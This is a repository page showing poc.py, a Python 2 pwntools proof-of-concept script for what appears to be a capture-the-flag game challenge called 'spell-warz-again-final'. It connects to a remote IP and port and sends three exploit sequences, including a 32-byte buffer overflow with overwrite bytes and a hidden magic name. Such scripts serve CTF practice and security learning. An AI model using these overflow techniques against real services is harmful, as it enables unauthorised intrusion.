myitinos
/
spell-warz-again-final
1
0
Fork 0
Code Issues 0 Pull Requests 0 Releases 0 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
7 Commits
1 Branch
456 KiB
Tree: 6e1a6a4b10
Branches Tags
${ item.name }
Create branch ${ searchTerm }
from '6e1a6a4b10'
${ noResults }
spell-warz-again-final/poc.py

71 lines
1.5 KiB
Raw Normal View History

update
5 years ago
first commit
5 years ago
more patch
5 years ago
update
5 years ago
update
5 years ago
update
5 years ago
first commit
5 years ago
update
5 years ago
first commit
5 years ago
update
5 years ago
first commit
5 years ago
update
5 years ago
update
5 years ago
update
5 years ago
update
5 years ago
more patch
5 years ago
update
5 years ago
more patch
5 years ago
first commit
5 years ago
update
5 years ago
update
5 years ago
update
5 years ago
more patch
5 years ago
 
  1. from pwn import process, remote
  2. 

  3. FILENAME = "./spell-warz-again-final"
  4. 

  5. def run():
  6.     # return process(FILENAME)
  7.     return remote("103.200.7.150", 60104)
  8. 

  9. def poc0():
  10.     p = run()
  11.     print p.recvuntil(">")
  12.     p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
  13.     print p.recvuntil(">")
  14.     p.sendline("y")
  15.     print p.recvuntil(">")
  16.     p.sendline("2")
  17.     print p.recvuntil(">")
  18.     p.sendline("4")
  19.     print p.recvuntil(">")
  20.     p.sendline("y")
  21.     for _ in xrange(10):
  22.         print p.recvuntil(">")
  23.         p.sendline("100")
  24.     p.interactive()
  25. 

  26. 

  27. def poc1():
  28.     p = run()
  29.     print p.recvuntil(">")
  30.     p.sendline("Leo")
  31.     print p.recvuntil(">")
  32.     p.sendline("y")
  33.     for _ in range(2):
  34.         print p.recvuntil(">")
  35.         p.sendline("3")
  36.         print p.recvuntil(">")
  37.         p.sendline("0")
  38.         print p.recvuntil(">")
  39.         p.sendline("y")
  40.         print p.recvuntil(">")
  41.         p.sendline("1")
  42.     print p.recvuntil(">")
  43.     p.sendline("4")
  44.     print p.recvuntil(">")
  45.     p.sendline("y")
  46.     for _ in range(10):
  47.         print p.recvuntil(">")
  48.         p.sendline("99")
  49.     p.interactive()
  50. 

  51. 

  52. def poc2():
  53.     p = run()
  54.     print p.recvuntil(">")
  55.     p.sendline("__th3_w0rLd_D3str0Y3r__")
  56.     print p.recvuntil(">")
  57.     p.sendline("y")
  58.     print p.recvuntil(">")
  59.     p.sendline("2")
  60.     print p.recvuntil(">")
  61.     p.sendline("4")
  62.     print p.recvuntil(">")
  63.     p.sendline("y")
  64.     for _ in xrange(10):
  65.         print p.recvuntil(">")
  66.         p.sendline("100")
  67.     p.interactive()
  68. 

  69. 

  70. if __name__ == "__main__":
  71.     poc1()